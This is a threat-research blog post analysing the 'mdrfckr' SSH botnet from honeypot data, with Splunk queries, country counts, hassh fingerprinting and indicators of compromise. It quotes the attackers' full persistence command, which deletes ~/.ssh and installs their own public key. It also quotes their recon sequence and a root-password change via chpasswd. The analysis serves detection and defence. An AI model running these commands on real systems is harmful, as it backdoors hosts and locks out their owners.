mdrfckrs – part one
The contents of this post takes place through October and November 2022.
Preface
The string ‘mdrfckr’ might ring a bell. It has previously been observed in relation to the ‘dota’-malware family. As ‘dota.tar.gz’ and ‘dota3.tar.gz’ were only observed 66 and 33 times, respectively, out of 12913 observations related to the ‘mdrfckr’-string, this post does not focus on the dota-files – the system does not even allow for the execution of the file.
The focus of this post is on the status of this botnet (going 5 years strong, as per this ubuntuforums.org post) and how to fingerprint it. Indicators can be found in the bottom of the post.
More information about the dota-family here:
https://blogs.juniper.net/en-us/threat-research/dota3-is-your-internet-of-things-device-moonlighting
https://www.countercraftsec.com/blog/dota3-malware-again-and-again/
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/
Basis of the post
It’s time for the first chapter of the mdrfckr-saga. This will serve as part one and covers how a botnet of a minimum of ~13000 operates from initial access to how persistence is attempted, and how to use the botnets methodology to fingerprint it.
In late September of 2022 I set up a network of nodes with the sole purpose of collecting data from connections made to port 22 – good ol’ ssh. In total, 10 servers spread across the globe provide the foundation for the dataset. At the time of writing, a little over 57000 unique IPs have been visiting the servers.
For the first two months, October and November 2022, the data was simply observed coming in. Some slight tweaks were made to the system to automate it more, while grasping the functionality of Splunk. After multiple check-ins to see what kind of data came in, one mouthful of a string kept appearing:
cd ~ && rm -rf .ssh && mkdir .ssh && echo
"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7V
vAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0E
pZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgL
Muakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmP
ecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGP
K5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWY
YjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"
>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~This is a public key used to log in via ssh on systems, instead of using passwords.
Deconstructing this string translates to:
- Changing directory to the current user’s home directory.
- Forcefully and recursively removing the hidden folder named ‘.ssh’, before creating it again.
- Echo the string ‘ssh-rsa AAAAB3Nza[…]oRw== mdrfckr’ into the ‘authorized_keys’ file. Note the ‘mdrfckr’ comment associated with the key.
- Recursively changing the permissions of the newly created ‘.ssh’ for ‘go (group/others) folder to be equal to nothing (=), before changing directory back to the current user’s home directory. This ensure that only the user can access the directory, not any group members or others.
At first, a Splunk query for just the string ‘mdrfckr’ will be executed to get a grasp of how big the scale is, as well as seeing what other things might be found within the same session as the string.
mdrfckr
| timechart span=1d countWhich yields:
The string ‘mdrfckr’ is observed up to 12795 times a day, and as low as 866 times a day during the two month period.
All observations could in theory be done by a single IP using this query, so to get a better grasp of how many mdrfckrs are out there, further filtering and analysis is required.
mdrfckr
| dedup src_ip
| timechart span=1d countBy adding ‘dedup src_ip’, short for de-deplicate, only unique IPs per timespan are included. Currently, a timespan of 1 day is used. This yields:
The two charts do not appear to have much correlation until the latter parts of November. Although, as mentioned, this chart filters by day. A query, without the chart, reveals that a total of 12913 unique IP adresses have executed a command that includes ‘mdrfckr’ in the two month period.
Nearly 13000 unique IPs within a two month period warrants further investigation.
Mapping it out
mdrfckr
| dedup src_ip
| iplocation src_ip
| stats count by Country
| geom geo_countries featureIdField="Country"The ‘iplocation’ command maps an IPv4/IPv6 adress to a country, while ‘geom’ adds further data, in the form of geographic data structures to the result, assisting in the creation of the chloropeth map seen below. The ‘featureIdField="Country"’ defines that we want countries marked.
A total of 152 countries have been observed – the top 10 countries can be seen in the table below:
| Country | Count | % |
|---|---|---|
| United States | 2762 | 21.4 |
| Singapore | 1169 | 9.06 |
| India | 834 | 6.46 |
| Germany | 833 | 6.45 |
| Brazil | 687 | 5.32 |
| Hong Kong | 489 | 3.79 |
| Russia | 485 | 3.76 |
| China | 447 | 3.46 |
| Indonesia | 437 | 3.39 |
| South Korea | 428 | 3.32 |
| Other | 4342 | 33.59 |
| Total | 12913 | 100 |
It is observed that most mdrfckrs are coming from the US – a little over one in five. Traffic does not come from one, or few, specific countries of origin. This activity is seen worldwide.
Further investigation
The first observed session that included the string ‘mdrfckr’ was seen on 2022-10-01T00:00:58 UTC and was observed on a node in Helsinki, Finland. It came from AWS.
session: e747bfa676be
client: SSH-2.0-libssh-0.6.3
hassh: 51cba57125523ce4b9db67714a90bf6e
user: root
password: 123@
duration: 15.8 sec
During the session, a total of 15 unique commands were observed. The amount of times the command was observed in the same time period is noted as well for the whole index, not only observed with ‘mdrfckr’.
The amount of times the commands are observed within the timeframe is checked to potentially correlate the commands to mdrfckrs or to see if they are generally used commands by other parties as well.
If the observed number is in the same ballpark as the amount of observed unique IPs, 12913, a strong correlation can be made.
A table overview can be seen below. The ‘count’ and ‘diff’ column compare against the 12913 unique IPs.
| Command | Example Output | Count | Diff |
|---|---|---|---|
| cat /proc/cpuinfo | grep name | wc -l | 4 | 13002 | +0.68% |
| echo "root:*"|chpasswd|bash" | 11926 | -7.65% | |
| cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’ | Intel(R) Celeron(R) CPU J3455 @ 1.50GHz | 12981 | +0.53% |
| free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’ | 7795 4219 607 1 2968 3256 | 12982 | +0.53% |
| ls -lh $(which ls) | -rwxr-xr-x 1 root root 135K Feb 7 2022 /usr/bin/ls | 12982 | +0.53% |
| which ls | /usr/bin/ls | 12983 | +0.54% |
| crontab -l | shows cronjobs | 12979 | +0.51% |
| w | 14:48:27 up 13 days, 20:12, 6 users, load average: 0.16, 0.38, 0.50 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user pts/0 x.x.x.x 11Feb23 3:48m 0.06s 0.01s command-run | 13059 | +1.13% |
| uname -m | x86_64 | 12982 | +0.53% |
| cat /proc/cpuinfo | grep model | grep name | wc -l | 4 | 12976 | +0.49% |
| top | shows top gui | 12991 | +0.60% |
| uname | Linux | 13854 | +7.29% |
| uname -a | Linux hostname 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux | 13712 | +6.19% |
| lscpu | grep Model | Model name: Intel(R) Celeron(R) CPU J3455 @ 1.50GHz Model: 92 | 12965 | -0.40% |
.. Followed by the ‘mdrfckr’-command. The commands listed were run in the order in which they are written.
Note: The password is unique per session. If the query uses a wildcard instead of the observed password from that specific session, the observation is 11926 (diff -987/7.65%) instead.
Example: $ echo "root:password"|chpasswd|bash
It is observed that the more common commands, such as ‘uname’, with, and without, the ‘-a’-switch produce differences greater than what commands with multiple pipes or more uncommon switches do. As such, the more specific a command from the table is, the more likely it is to be associated with a mdrfckr.
Most commands stay between -0.40 and +0.68 percentage points of the number of unique IPs observed with the mdrfckr-string. Thus, these commands are closely associated with the mdrfckrs and a strong correlation can be made.
By now the recon part has concluded and the mdrfckr ssh key has replaced the any other key inside the authorized_keys file. This is done to remove access for the currently allowed users and ensure persistence. The created authorized_keys file is known by Virustotal. It was first observed on 2018-07-05 17:21:41 UTC. A quick search reveals that this hash is well known.
mdrfckr fingerprints
To further verify that all 12913 unique IPs observed are associated with each other and to provide more evidence alongside the observed commands run, the unique ‘hassh’ value of the observed clients can be checked.
‘hassh‘ is a unique fingerprinting method developed by Salesforce and acts like a profiling tool by examining the key exchange (‘SSH_MSG_KEYXINIT‘, which is plaintext) messages exchanged by the ssh client and server when establishing the connection. The exchange of ciphers and the ordering of them is so unique that they can be fingerprinted. A ‘hassh’ output is an MD5 hash. A list of hassh values and the assoiated client banners observed can be found on github.
First, we check the hassh value from the previously mentioned session:
session: e747bfa676be
client: SSH-2.0-libssh-0.6.3
hassh: 51cba57125523ce4b9db67714a90bf6e
The client announces it is SSH-2.0-libssh-0.6.3, which corresponds to a hassh of 51cba57125523ce4b9db67714a90bf6e. Interestingly, this hassh matches the client SSH-2.0-libssh-0.6.0 as well. This means that the variables being fingerprinted did not change from version 0.6.0 to version 0.6.3.
As we cannot fully trust that the client name is correct, we rely on the hassh value. A search for the hassh is done alongside a de-duplication of source IPs.
As this number is close to the original starting point of 12913 unique IPs, a difference of 129 or 0.9%. This concludes that there is a 99.1% risk to get a ‘mdrfckr’ if the hassh 51cba57125523ce4b9db67714a90bf6e is observed based on this dataset.
Part two is next, which will cover how the botnet changed tactics in December 2022. Specifically, a new ssh client and a change in the ‘mdrfckr’-string.
References
https://www.virustotal.com/gui/file/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2/details
https://blogs.juniper.net/en-us/threat-research/dota3-is-your-internet-of-things-device-moonlighting
https://www.countercraftsec.com/blog/dota3-malware-again-and-again/
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/
Indicators
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
authorized_keys a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
SSH-2.0-libssh-0.6.3 / SSH-2.0-libssh-0.6.0 51cba57125523ce4b9db67714a90bf6e